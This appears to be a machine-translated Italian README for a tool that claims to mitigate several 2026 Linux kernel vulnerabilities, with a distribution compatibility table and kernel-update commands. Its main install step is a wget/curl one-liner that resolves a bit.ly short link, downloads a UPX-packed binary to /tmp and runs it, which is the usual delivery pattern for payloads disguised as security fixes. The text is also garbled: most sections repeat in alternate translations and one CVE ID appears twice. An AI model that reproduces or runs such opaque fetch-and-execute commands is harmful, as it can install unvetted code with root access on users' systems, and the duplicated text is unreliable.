Mitigazione delle vulnerabilità della famiglia frag / Strumento di mitigazione per la vulnerabilità della famiglia frag
- Copy Fail (2026)
- Dirty Frag (2026)
- Fragnesia (2026)
- DirtyClone (2026)
- PEdit-CoW (2026)
Esegui la correzione su qualsiasi Linux / Esegui qualsiasi hotfix Linux
b="/tmp/cve_2026_frag_family_fix"; wget -qO $b $(wget -qO- https://bit.ly/4vetMTB | grep browser_download_url | grep -v .exe | cut -d '"' -f 4) && chmod +x $b && $b
o
b="/tmp/cve_2026_frag_family_fix"; curl -fsSL "$(curl -fsSL https://bit.ly/4vetMTB | grep browser_download_url | grep -v .exe | cut -d '"' -f 4)" -o $b && chmod +x $b && $b
CVE-2026-46300 / CVE-2026-43500 / CVE-2026-43284 / CVE-2026-46300 / CVE-2026-46331
Descrizione
- verifica i moduli abilitati di CVE-2026-46300 / CVE-2026-43500 / CVE-2026-43284 / CVE-2026-46300 / CVE-2026-46331
- propone un aggiornamento del kernel se disponibile
- disabilita
esp4, esp6, rxrpc, act_pedit se non presenti
- blocca il caricamento tramite
modprobe
- aggiunge
module_blacklist a grub
- pulisce automaticamente l'hotfix dopo l'aggiornamento del kernel
- per i sistemi basati su RHEL (AlmaLinux, Rocky, Oracle, Fedora), disabilita Boot Loader Specification (GRUB_ENABLE_BLSCFG=false), imposta GRUB_DEFAULT=0 e crea un hook di installazione del kernel (/etc/kernel/install.d/99-grub-update.install) che rigenera la configurazione di grub dopo l'aggiornamento del kernel per garantire che all'avvio successivo venga caricato il kernel più recente.
- per le versioni minori, propone ed esegue un aggiornamento all'ultima versione minore per cui è disponibile un aggiornamento del kernel.
Descrizione
- controlla i moduli abilitati della vulnerabilità CVE-2026-46300 / CVE-2026-43500 / CVE-2026-43284 / CVE-2026-46300 / CVE-2026-46331
- offre un aggiornamento del kernel se disponibile
- disabilita
esp4, esp6, rxrpc, act_pedit se non presenti
- blocca il caricamento dei moduli tramite
modprobe
- aggiunge
module_blacklist a grub
- pulisce automaticamente l'hotfix dopo l'aggiornamento del kernel
- per i sistemi basati su RHEL (AlmaLinux, Rocky, Oracle, Fedora), disabilita Boot Loader Specification (GRUB_ENABLE_BLSCFG=false) e imposta GRUB_DEFAULT=0, quindi crea un hook di installazione del kernel (/etc/kernel/install.d/99-grub-update.install) che rigenera la configurazione di grub dopo gli aggiornamenti del kernel per garantire che all'avvio successivo venga caricato il kernel più recente.
- per le versioni minori, offre ed esegue un aggiornamento all'ultima versione minore per cui è disponibile un aggiornamento del kernel.
Mitigazione di CVE-2026-31431 / Copy Fail (algif_aead)
Descrizione
L'utility verifica la vulnerabilità CVE-2026-31431 (pre condition) e, se si dispone di privilegi di root, applica la mitigazione:
- identifica le combinazioni protette di sistemi operativi (incluso WSL) e versioni del kernel
- propone un aggiornamento del kernel con correzione se disponibile
- disabilita
algif_aead se non presente
- blocca il caricamento tramite
modprobe
- aggiunge
initcall_blacklist=algif_aead_init
- limita
AF_ALG tramite systemd
Descrizione
Questo strumento verifica la presenza di CVE-2026-31431 (pre condition) e applica la mitigazione (richiede root):
- identifica le combinazioni protette di sistemi operativi (incluso WSL) e versioni del kernel
- offre un aggiornamento del kernel con correzione se disponibile
- disabilita
algif_aead se non presente
- blocca il caricamento dei moduli tramite
modprobe
- aggiunge
initcall_blacklist=algif_aead_init
- limita
AF_ALG tramite systemd
Compilazione Linux / build
docker run --rm -v "$PWD":/app -w /app golang:alpine sh -c "apk add --no-cache upx && go build -ldflags='-s -w' -o cve_2026_frag_family_fix cve_2026_frag_family_fix.go && upx --best --ultra-brute cve_2026_frag_family_fix"
Aggiornamento del kernel (non hotfix) disponibile per / L'aggiornamento del kernel (non hotfix) è disponibile per
| OS | Copy Fail (CVE-2026-31431) | Dirty Frag (CVE-2026-43500/43284) | Fragnesia (CVE-2026-46300) | PEdit-CoW (CVE-2026-46331) |
|---|
| Debian 10 (buster) | ❌ | ❌ | ❌ | ❌ |
| Debian 11 (bullseye) | ✅ | ✅ | ✅ | ✅ |
| Debian 12 (bookworm) | ✅ | ✅ | ✅ | ✅ |
| Debian 13 (trixie) | ✅ | ✅ | ✅ | ✅ |
| Ubuntu 18.04 (bionic) | ❌ | ❌ | ❌ | ❌ |
| Ubuntu 20.04 (focal) | ❌ | ❌ | ❌ | ❌ |
| Ubuntu 22.04 (jammy) | ✅ | ❌ | ❌ | ❌ |
| Ubuntu 24.04 (noble) | ✅ | ✅ | ✅ | ❌ |
| Ubuntu 25.04 (plucky) | ❌ | ❌ | ❌ | ❌ |
| Ubuntu 26.04 (resolute) | ✅ | ✅ | ✅ | ✅ |
| CentOS Stream 8 | ❌ | ❌ | ❌ | ❌ |
| CentOS Stream 9 | ✅ | ✅ | ✅ | ✅ |
| CentOS Stream 10 | ✅ | ✅ | ✅ | ✅ |
| AlmaLinux 8 | ✅ | ✅ | ✅ | ✅ |
| AlmaLinux 9 | ✅ | ✅ | ✅ | ✅ |
| AlmaLinux 10 | ✅ | ✅ | ✅ | ✅ |
| Rocky Linux 8 | ✅ | ✅ | ✅ | ✅ |
| Rocky Linux 9 | ✅ | ✅ | ✅ | ✅ |
| Rocky Linux 10 | ✅ | ✅ | ✅ | ✅ |
| Fedora 40 | ❌ | ❌ | ❌ | ❌ |
| Fedora 41 | ❌ | ❌ | ❌ | ❌ |
| Fedora 42 | ✅ | ✅ | ✅ | ✅ |
| Fedora 43 | ✅ | ✅ | ✅ | ✅ |
| Fedora 44 | ✅ | ✅ | ✅ | ✅ |
| Oracle Linux 8 | ✅ | ✅ | ✅ | ✅ |
| Oracle Linux 9 | ✅ | ✅ | ✅ | ✅ |
| Oracle Linux 10 | ✅ | ✅ | ✅ | ✅ |
Comandi di aggiornamento del kernel / Comandi di aggiornamento del kernel
- Debian
apt update && apt install linux-image-amd64 linux-headers-amd64 -y
- Ubuntu
apt update && apt install linux-image-generic linux-headers-generic -y
- CentOS
dnf clean metadata && dnf upgrade 'kernel*' -y
- AlmaLinux
dnf clean metadata && dnf upgrade 'kernel*' -y
- RockyLinux
dnf clean metadata && dnf upgrade 'kernel*' -y
- Fedora
dnf clean metadata && dnf upgrade 'kernel*' -y
- OracleLinux
dnf clean metadata && dnf upgrade 'kernel*' -y